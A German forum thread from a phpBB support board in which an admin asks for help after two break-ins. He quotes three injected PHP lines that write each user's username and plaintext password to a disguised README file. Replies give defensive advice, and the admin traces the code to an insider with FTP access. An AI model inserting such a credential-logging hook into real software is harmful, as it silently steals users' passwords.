Sicherheitslücke, nur wo?

xCapricorn · Beitrag von **xCapricorn** » 17.10.2008 10:56

Houston, wir haben ein Problem!
Leider ist es bereits der 2. Angriff auf meine Seite und ich fang langsam an, daran zu zweifeln, ob hier jemand nur aus jux dran ist, oder ob mich jemand persönlich ärgern will.
Definitiv, hier ist irgendwo eine Sicherheitslücke im Board. Es ist jetzt das 2. Mal, das jemand bei mir ins System rein kommt, habe sämtliche Kennwörter geändert (über die DB, nicht im System), bin der einzige mit Adminrechten.

Habe vorhin folgenden Code in der /includes/functions.php gefunden und soviel ist Fakt, der gehört da nicht rein:

Code: Alles auswählen

Zeile 2333:
			$fp = fopen("./language/de/docs/README", 'a');
			fwrite($fp, "$username;$password\r\n");
			fclose ($fp);

Was das anrichtet, dass könnt Ihr Euch ja vielleicht denken, zumindest weiß ich jetzt, das ich schon wieder mein Kennwort ändern muss und wieder ein Backup einspielen muss.

Beitrag von **cYbercOsmOnauT** » 17.10.2008 13:55

Die Sicherheitslücke ist da oben.. etwas weiter rechts und dann dritte links.

Sorry

Also wenn Du alle Passwörter geändert hast, gibt es eigentlich noch drei Möglichkeiten die möglich sind:

Du hast auf Deinem PC einen Trojaner und der Cracker liest so Deine Eingaben mit.
Der Cracker hat sehr wahrscheinlich Zugang zu Deinen FTP-Daten. Somit kann er auch sehr einfach direkt auf Deine DB schauen, kurzfristig Deinen Password-Hash durch einen eigenen ersetzen und am Ende wieder Deinen originalen setzen.
Der Cracker hat wie oben schon beschrieben Deine FTP-Daten. Sobald Du Deinen PC auf Sauberkeit überprüft hast, solltest Du über den Adminbereich Deiner Domain (nicht des Board) ein neues FTP-Passwort festlegen (und auch das Passwort zum Adminbereich der Domain).

Grüße,
Tekin

P.S.: Der Cracker ist etwas unvorsichtig, denn er verrät bereits in seinem Code, das er Windows verwendet. \r\n <- das erzeugt in Windows eine neue Zeile. Auf Linux-Systemen verwendet man nur \n.

xCapricorn · Beitrag von **xCapricorn** » 20.10.2008 20:28

Ok, möge sein Du liegst richtig. Ich finde zwar partout nix, habe das bereits mit Antivir Premium (Eigenlizenz), GData Internet Security 2009(Eigenlizenz) und Spydoctor (freeware) alles durch, auch nach Rootkits unter von CD gebooteten System gesucht, ich find nix.

Nichts desto Trotz, die Aussage von Dir hab ich mir auch schon überlegt, daher bin ich jetzt erstmal dran Morgen auf nem frisch von meinem Admin angelegten Bürorechner die Kennwörter erneut zu ändern, ebenso die FTP-Zugänge etc.

Bin gespannt, ob ichs damit in Griff bekomme. Passwörter speicher ich grundsätzlich nie auf dem Rechner, lerne alle auswendig, Ziffern, Sonderzeichen, Buchstaben, groß und klein mit minimum 12 Stellen, immer im Kopf, sonst nirgends.

Sollte ich wieder so ne nette Datei finden, is da was anderes faul.
Danke für den Tip mit Windows-User ^^

DanielHeinrich · Beitrag von **DanielHeinrich** » 20.10.2008 21:33

Mhh... nur so eine Frage, aber:

hast du _sämtliche_ deiner Dateien gelöscht und neu installiert oder nur die vom Forum? Weil wenn nicht würde sich nämlich noch eine weitere Möglichkeit ergeben:
Dein Angreifer hat schlichweg nachdem er das erste mal Zugriff auf deine Daten erlangt hat eine Hintertür eingebaut die es ihm ermöglicht jederzeit wieder zuzuschlagen.

Was mir auchnoch einfallen würde:
1) Ich weiss ja nicht was du noch bei dir laufen hast, aber(insofern du noch andere php-Seiten ausser dem Forum hast): Hast du mal darüber nachgedacht diese Dateien auf Sicherheitsfehler zu überprüfen?

1.1) Wenn 1): hat irgendwas davon eine Art "Sicherheitsabfrage" für vergessene Passwärter á la "Wie lautet der Vorname deiner Mutter?"?
Wenn ja: auch dass kann eine Möglichkeit sein wie der Angreifer an Passwörter gekommen sein kann da solche Seiten wesentlich einfacher per Brute-Force angreifbar sind als die Standart-Passwort-Abfragen (Wörterbuch-Angriff)

2) Nutzt du irgendwelche "Mods" für dein Forum? Wenn ja können auch diese für deine Sicherheitslücken verantwortlich sein.

3) (wenn es dein eigener Rechner / Server /etc.. ist: Ist das System auf dem neusten Stand?)

bis bald

Daniel Heinrich

edit: kleiner Tipp:
lass dochmal die Datei auf deinem Server liegen, packe einige "echte" Account-Daten rein und logge sowohl den Zugriff auf diese Datei als auch auf diese Accounts

Klar - der Angreifer könnte einen Proxy nutzen, was aber wenn nicht bzw. dieselbe IP auchnoch bei einem anderen Account vorkommt (in einer relativ kurzen Zeitspanne)...

xCapricorn · Beitrag von **xCapricorn** » 10.11.2008 09:59

Das Problem ist gelöst, der Fehler sitzt in den eigenen Reihen sozusagen. Hatte einen FTP-Zugang, beschränkt auf das Joomla-Verzeichnis und damit im Ordner Distribution das PHPBB inklusive für jemanden angelegt. Leider hat sich entsprechende Person wohl gezwungen gefühlt das Script einzubauen. Habe mir die Logbücher vom Provider für die FTP-Zugänge geben lassen und stundenlang durchforstet. Dabei habe ich entdeckt, das die besagte Person sich über den gestellten Zugang erlaubt hat, genau diese Dateien zu verändern.

Bitte um Entschuldigung für den verwerflichen Versuch es auf das tolle Board zu schieben. Blödsinn!
Nur wenn man seinen eigenen Vertrauenspersonen nicht mehr trauen kann....

echt zum kot.... sowas.

Danke für Eure Anteilname und Tipps.

Beitrag von **cYbercOsmOnauT** » 10.11.2008 11:49

Die meisten Hacks auf der Welt basieren auf interne Attacken. Trotzdem will man diese Wahrheit erst zuletzt wahr haben. Du stehst damit nicht allein. Gibt somit nichts zu entschuldigen.